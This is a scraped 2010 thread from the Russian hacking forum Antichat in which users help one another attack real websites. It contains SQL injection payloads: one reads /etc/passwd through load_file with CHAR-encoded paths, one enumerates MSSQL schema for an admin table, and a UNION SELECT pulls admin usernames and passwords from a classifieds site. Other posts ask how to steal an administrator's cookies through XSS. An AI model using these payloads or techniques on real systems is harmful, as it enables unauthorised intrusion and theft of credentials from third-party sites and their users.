ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12951  
Старый 06.05.2010, 19:23
Аватар для kfor
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию

Цитата:
Сообщение от Konqi  
Попробуй

load_file(CHAR(47,101,116,99,47,112,97,115,115,119 ,100))
Из прошлого запроса видно что ковычка не фильтруется.
 
Ответить с цитированием

  #12952  
Старый 06.05.2010, 19:30
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

Цитата:
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=(SELECT+TOP+1+COLUMN_NAME +FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME= char(116)+char(98)+char(108)+char(95)+char(103)+ch ar(114)+char(111)+char(117)+char(112)+char(95)+cha r(97)+char(100)+char(109)+char(105)+char(110))-- syntaxe incorrecte vers 'char'.
на encode не пробовал
заменив "+" на "%2B"
скорее всего причина в этом

(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=char(116)%2Bchar(98)%2Bch ar(108)%2Bchar(95)%2Bchar(103)%2Bchar(114)%2Bchar( 111)%2Bchar(117)%2Bchar(112)%2Bchar(95)%2Bchar(97) %2Bchar(100)%2Bchar(109)%2Bchar(105)%2Bchar(110))--
 
Ответить с цитированием

  #12953  
Старый 06.05.2010, 19:36
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

2 pinch

nea,тот же результат =(
 
Ответить с цитированием

  #12954  
Старый 06.05.2010, 19:39
Аватар для pinch
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

интересно может ссылку дашь....
 
Ответить с цитированием

  #12955  
Старый 06.05.2010, 20:03
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от pinch  
интересно может ссылку дашь....
в личку
 
Ответить с цитированием

  #12956  
Старый 06.05.2010, 20:03
Аватар для *uNkN0Wn*
*uNkN0Wn*
Участник форума
Регистрация: 25.03.2009
Сообщений: 149
Провел на форуме:
1739459

Репутация: 116
Отправить сообщение для *uNkN0Wn* с помощью ICQ
По умолчанию

А мне кто поможет?
Цитата:
Есть активная xss. Как через яваскрипт сделать размер ифрейма на весь экран?
p.s. С помощью этого <iframe src=//сайт>
 
Ответить с цитированием

  #12957  
Старый 06.05.2010, 20:05
Аватар для ReckouNT
ReckouNT
Новичок
Регистрация: 16.01.2009
Сообщений: 17
Провел на форуме:
31738

Репутация: 2
По умолчанию

Цитата:
Сообщение от Hero1n  
мдаааа, ты уже топик вроде создавал, и тебе там совершенно ясно ответили, зачем здесь пишешь?!
http://en.wikipedia.org/wiki/Basic_access_authentication
alert() тут не причём, это не javascript.
Создавать то создавал, но потом в описании раздела увидел, что нельзя, через день удалили тред.

Кинули ссылку на ман по тому как сделать, а я пока скорее нахожусь на уровне скрипт - кидди)

Из википедии понял только что шифрование на Base64, никаких уязвимостей там не написано.

ЗЫ: мой вопрос на странице 1293

Последний раз редактировалось ReckouNT; 06.05.2010 в 20:10..
 
Ответить с цитированием

  #12958  
Старый 06.05.2010, 20:24
Аватар для oko
oko
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737

Репутация: -5
По умолчанию

Подскажите как вытащить cookies с сайта, есть XSS уязвимость, задача вытащить cookies админа, испробавала пока на себе (document.cookie(JS)) нормально вытаскивает и записывает но одна проблема всего 4 значения а их там 6... т.е не все полностью тащит, есть еще какие то варианты?
 
Ответить с цитированием

  #12959  
Старый 06.05.2010, 23:10
Аватар для oko
oko
Познающий
Регистрация: 01.05.2010
Сообщений: 34
Провел на форуме:
118737

Репутация: -5
По умолчанию

Оказывается надо было просто аворитизироваться, и появится все параметры, вопрос закрыт
 
Ответить с цитированием

  #12960  
Старый 07.05.2010, 02:09
Аватар для Rabben
Rabben
Новичок
Регистрация: 27.03.2009
Сообщений: 11
Провел на форуме:
39049

Репутация: 1
По умолчанию

Исправьте запрос, никак не могу вывести таблицу
http://blocked/browse_classifieds.php?s=classified_date%20DESC&v= 0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admi n_password),2,3+from+se_admins

Последний раз редактировалось Rabben; 07.05.2010 в 03:16..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ